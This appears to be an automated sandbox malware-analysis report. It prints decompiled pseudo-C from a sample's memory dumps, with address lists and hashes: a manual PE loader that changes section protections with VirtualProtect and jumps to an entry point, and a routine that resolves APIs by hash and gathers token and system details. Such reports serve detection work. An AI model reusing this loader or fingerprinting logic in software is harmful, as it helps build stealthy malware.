					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0xec4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E00EC2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00ec221f
0x00ec222d
0x00ec2234
0x00ec2237
0x00ec2241
0x00ec2248
0x00ec2252
0x00ec2258
0x00ec2261
0x00ec226a
0x00ec226d
0x00ec2273
0x00ec2277
0x00ec227f
0x00ec2283
0x00ec2286
0x00ec2289
0x00ec228c
0x00ec228f
0x00ec22a9
0x00ec22af
0x00ec22b2
0x00ec22ba
0x00ec22be
0x00ec22c1
0x00ec22c4
0x00ec22c7
0x00ec22ca
0x00ec22e6
0x00ec2303
0x00ec2328
0x00ec232a
0x00ec2333
0x00ec2336
0x00ec2340
0x00ec2343
0x00ec2346
0x00ec2349
0x00ec234c
0x00ec23a4
0x00ec23a4
0x00ec254a
0x00ec2550
0x00ec244d
0x00ec2453
0x00ec249f
0x00ec249f
0x00ec24bc
0x00ec24e2
0x00ec24f0
0x00ec24f3
0x00ec24f7
0x00ec24fb
0x00ec2502
0x00ec2508
0x00ec250a
0x00ec251c
0x00ec2524
0x00ec252a
0x00ec2530
0x00ec2536
0x00000000
0x00000000
0x00ec253c
0x00ec249f
0x00ec245b
0x00ec2469
0x00ec2471
0x00ec2474
0x00ec2476
0x00ec247c
0x00ec2488
0x00ec248e
0x00ec2491
0x00ec2494
0x00ec238a
0x00ec238a
0x00ec23d8
0x00ec23de
0x00ec23e4
0x00ec23ea
0x00ec23f0
0x00ec23f5
0x00ec23fb
0x00ec23fe
0x00ec2401
0x00ec2409
0x00ec2411
0x00ec2414
0x00ec2417
0x00ec241d
0x00ec2423
0x00ec242e
0x00ec2362
0x00ec2368
0x00ec2368
0x00ec23c5

APIs

VirtualProtect.KERNELBASE ref: 00EC228F
VirtualProtect.KERNELBASE ref: 00EC2328

Strings

t, xrefs: 00EC2409

Memory Dump Source

Source File: 00000000.00000002.558706467.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: ea7a6b0e66dc5ebe318192fcef0d40ec4e4d01f6f23a5de3a505939f4f4fc3e0
Instruction ID: fc0050fa2ea8539341e8e962a61ab0a5e2b0fc3f11f83c17676ebdd518f62a7e
Opcode Fuzzy Hash: ea7a6b0e66dc5ebe318192fcef0d40ec4e4d01f6f23a5de3a505939f4f4fc3e0
Instruction Fuzzy Hash: B4819AB4D042098FCB04CF99C580A9DFBF1BF48310F65856EE958AB361D335A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00EC2508

Memory Dump Source

Source File: 00000000.00000002.558706467.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c07c33744d7235282a13a05d741b701054227c7e7e614feed936796c3d063df4
Instruction ID: eee72d49b89870b58d9ff34bd6d2fac01cd744d18318ccb288716b24e9dc3694
Opcode Fuzzy Hash: c07c33744d7235282a13a05d741b701054227c7e7e614feed936796c3d063df4
Instruction Fuzzy Hash: CB31B5B5D002288FDB24CF69C980A9DB7F1BF88204F2582A9D958A7345D631AE42CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00EC1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00EC1EA8

Memory Dump Source

Source File: 00000000.00000002.558706467.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: e622d2cfe94d7aa731d7411bc939c4a2c1e280ad8b8c09bab7fc8d1adbfa9681
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: BF41F3B1E042098FDB04DFA8C590AAEBBF1FF48314F15856EE809AB341D335A841CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 3220 Parent PID: 5328 rundll32.exeCOMMON

Executed Functions

Function 733307CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E733307CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x7333d1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E73333558(0x30);
					 *0x7333d1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E733335D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E73332F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x7333d1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E73331094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x7333d1f8 + 0xb)) = _t159;
						_t355 = E73332F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x7333d1f8 + 0x28)) = 0;
							_t163 = E733307CC(0x7333d1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x7333bc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x7333bc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E7332F620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E7332F8C4(_t424 + 0x24, E7332F568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E7332F558(_t424 + 0x24, E7332F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E733354EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E7332F6F0(_t424 + 0x20);
								E7333551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E733357D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E7332E054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E7333551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E733357D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E7332E054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E7333551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E733357D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E7332E054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E7332D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E733354C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E7332D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E733354C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E7332D098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E733354C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E7332D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E733354C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E7332D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E733354C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E7332D098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E733354C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x7333d1f8 + 0x24)) = _t186;
							_t187 = E733310CC(0xffffffffffffffff);
							_t314 =  *0x7333d1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x7333d1f8 + 0x2c)) = E73331140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E73332F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x7333d1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E7333352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E73332F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E7333352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E7332F620(_t424 + 0x18c, _t202);
											_t403 = E73332F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E7332F6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E7332F558(_t424 + 0x18c, 0);
												_t209 = E7332F568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E7333352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E7332F558(_t424 + 0x18c, 0);
													E7332DFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E73332F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E7332E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E73332F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E7332E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E73334BE0( *((intOrPtr*)(_t424 + 0x1b8)), E7332E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E7332E054(_t424 + 0x1b8);
														E7332E054(_t424 + 0x1b0);
														E7332F6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E7332BC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x7333d1f8 + 0x2c)) = 6;
															L78:
															_t192 = E73332F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x7333d1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E7332BC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E7333352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E73332F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E7333352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E7332F620(_t424 + 0x3c, _t258);
									_t261 = E73332F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E7332F6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E7332F558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E7332F568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E7333352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E7332F558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E73332F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E7333352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E73331070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E73332F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E7332BC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x733307cc
0x733307cd
0x733307ce
0x733307d0
0x733307db
0x733307dd
0x733307e4
0x73331063
0x73331069
0x73331069
0x733307ee
0x733307fa
0x73330806
0x7333080b
0x73330818
0x73330822
0x73330829
0x7333082e
0x73330832
0x73330836
0x7333083b
0x7333083e
0x73330844
0x7333084a
0x73330857
0x7333085e
0x73330865
0x73330868
0x7333086b
0x7333086d
0x73330879
0x73330886
0x73330893
0x73330895
0x73330897
0x73330923
0x73330923
0x73330929
0x7333092c
0x73330931
0x73330934
0x7333094c
0x7333094d
0x7333094d
0x7333094d
0x73330951
0x7333095a
0x7333095f
0x7333095f
0x73330961
0x73330972
0x73330994
0x73330996
0x73330997
0x7333099b
0x7333099b
0x733309a4
0x733309b0
0x733309b9
0x733309cf
0x733309df
0x733309e4
0x733309e8
0x733309ed
0x733309ef
0x73330a3f
0x73330a54
0x73330a58
0x73330a5d
0x73330a6e
0x73330a83
0x73330a87
0x73330a8c
0x73330a8e
0x73330ad5
0x73330ad8
0x73330b26
0x73330b29
0x00000000
0x73330b2b
0x73330b2b
0x73330b2e
0x00000000
0x73330b30
0x73330b34
0x73330b39
0x73330b3e
0x73330b40
0x73330b44
0x73330b46
0x73330b4d
0x73330b4d
0x73330b48
0x73330b48
0x73330b4b
0x73330b51
0x73330b51
0x00000000
0x00000000
0x00000000
0x73330b4b
0x73330b53
0x73330b55
0x73330b58
0x73330b58
0x73330b55
0x73330b5d
0x73330b67
0x73330b67
0x73330b2e
0x73330ada
0x73330ada
0x73330adc
0x73330b1b
0x73330b1e
0x73330e90
0x73330e95
0x73330e9a
0x73330e9c
0x73330ea0
0x73330ea2
0x73330ea9
0x73330ea9
0x73330ea4
0x73330ea4
0x73330ea7
0x73330ead
0x73330ead
0x00000000
0x00000000
0x00000000
0x73330ea7
0x73330eaf
0x73330eb1
0x73330eb4
0x73330eb4
0x73330eb1
0x73330eb9
0x73330ec3
0x73330b24
0x00000000
0x73330b24
0x73330ade
0x73330ae2
0x73330ae7
0x73330aec
0x73330aee
0x73330af2
0x73330af4
0x73330afb
0x73330afb
0x73330af6
0x73330af6
0x73330af9
0x73330aff
0x73330aff
0x00000000
0x00000000
0x00000000
0x73330af9
0x73330b01
0x73330b03
0x73330b06
0x73330b06
0x73330b03
0x73330b0b
0x73330b15
0x73330b15
0x73330adc
0x73330a90
0x73330a90
0x73330a92
0x73330b6a
0x73330b6e
0x73330b73
0x73330b78
0x73330b7a
0x73330b7e
0x73330b80
0x73330b87
0x73330b87
0x73330b82
0x73330b82
0x73330b85
0x73330b8b
0x73330b8b
0x00000000
0x00000000
0x00000000
0x73330b85
0x73330b8d
0x73330b8f
0x73330b92
0x73330b92
0x73330b8f
0x73330b97
0x73330b97
0x73330b99
0x73330a98
0x73330a9c
0x73330aa1
0x73330aa6
0x73330aa8
0x73330aac
0x73330aae
0x73330ab5
0x73330ab5
0x73330ab0
0x73330ab0
0x73330ab3
0x73330ab9
0x73330ab9
0x00000000
0x00000000
0x00000000
0x73330ab3
0x73330abb
0x73330abd
0x73330ac0
0x73330ac0
0x73330abd
0x73330ac5
0x73330acf
0x73330acf
0x73330a92
0x733309f1
0x733309f5
0x733309fa
0x733309ff
0x73330a01
0x73330a05
0x73330a07
0x73330a0e
0x73330a0e
0x73330a09
0x73330a09
0x73330a0c
0x73330a12
0x73330a12
0x00000000
0x00000000
0x00000000
0x73330a0c
0x73330a14
0x73330a16
0x73330a19
0x73330a19
0x73330a16
0x73330a1e
0x73330a28
0x73330a28
0x73330936
0x73330938
0x73330938
0x73330ba2
0x73330ba5
0x73330baa
0x73330bac
0x73330bb5
0x73330bc1
0x73330bc4
0x73330c92
0x73330c9a
0x00000000
0x73330bca
0x73330bd4
0x73330be6
0x73330be8
0x73330bea
0x73330c76
0x73330c76
0x73330c78
0x73330c7c
0x73330c87
0x73330c7e
0x73330c7e
0x73330c7e
0x00000000
0x73330bf0
0x73330bfc
0x73330bfe
0x73330c00
0x7333104f
0x73331054
0x73331056
0x00000000
0x7333105c
0x00000000
0x7333105c
0x73330c06
0x73330c06
0x73330c17
0x73330c1b
0x73330c20
0x73330c32
0x73330c34
0x73330c36
0x73330c4d
0x73330c4f
0x73330c51
0x73330ec9
0x73330ec9
0x73330c51
0x73330c57
0x73330c5e
0x73330c60
0x73330edb
0x73330ef1
0x73330ef3
0x73330ef5
0x73331030
0x73331037
0x00000000
0x73330efb
0x73330f04
0x73330f12
0x73330f2c
0x73330f2e
0x73330f30
0x73331041
0x73331046
0x73331048
0x00000000
0x7333104a
0x00000000
0x7333104a
0x73330f36
0x73330f36
0x73330f44
0x73330f4f
0x73330f5e
0x73330f70
0x73330f72
0x73330f74
0x73330f81
0x73330f81
0x73330f91
0x73330fa2
0x73330fa7
0x73330fa9
0x73330fbf
0x73330fe0
0x73330fe9
0x73330ff5
0x73331001
0x73331006
0x7333100b
0x73331011
0x73331011
0x73331016
0x7333101c
0x00000000
0x73331022
0x73331024
0x73330c9d
0x73330ca9
0x73330cb0
0x73330cb2
0x73330cbc
0x73330cbc
0x73330cbe
0x73330cc0
0x73330ccf
0x73330cdb
0x73330cdf
0x73330ce2
0x73330ce5
0x73330ce8
0x00000000
0x73330ce8
0x73330fab
0x73330fab
0x73330fb2
0x73330fb3
0x73330fb3
0x73330fa9
0x73330f30
0x73330c66
0x73330c66
0x73330c66
0x73330c6b
0x73330c71
0x73330c71
0x00000000
0x73330c6b
0x73330c60
0x73330c00
0x73330bea
0x7333089d
0x733308a9
0x733308ab
0x733308ad
0x73330e7a
0x73330e7f
0x73330e81
0x00000000
0x73330e87
0x00000000
0x73330e87
0x733308b3
0x733308b3
0x733308c4
0x733308c8
0x733308cd
0x733308da
0x733308e1
0x733308e3
0x733308fa
0x733308fc
0x733308fe
0x73330cf6
0x73330cf6
0x733308fe
0x73330904
0x7333090b
0x7333090d
0x73330d05
0x73330d16
0x73330d1b
0x73330d1d
0x73330d1f
0x73330e50
0x73330e54
0x00000000
0x73330d25
0x73330d2b
0x73330d50
0x73330d52
0x73330d54
0x73330e6c
0x73330e71
0x73330e73
0x00000000
0x73330e75
0x00000000
0x73330e75
0x73330d5a
0x73330d5a
0x73330d65
0x73330d6c
0x73330d73
0x73330d7a
0x73330d7b
0x73330d7c
0x73330d8e
0x73330d90
0x73330d92
0x00000000
0x73330d98
0x73330d9a
0x73330db5
0x73330db7
0x73330db9
0x73330e5e
0x73330e63
0x73330e65
0x00000000
0x73330e67
0x00000000
0x73330e67
0x73330dbf
0x73330dbf
0x73330dbf
0x73330dc6
0x73330dca
0x73330e35
0x73330e35
0x73330e37
0x73330e3e
0x73330e3e
0x73330e39
0x73330e39
0x73330e3c
0x73330e42
0x73330e42
0x00000000
0x00000000
0x00000000
0x73330e3c
0x73330e44
0x73330e46
0x73330e4b
0x73330e4b
0x00000000
0x73330dcc
0x73330dcc
0x73330dcc
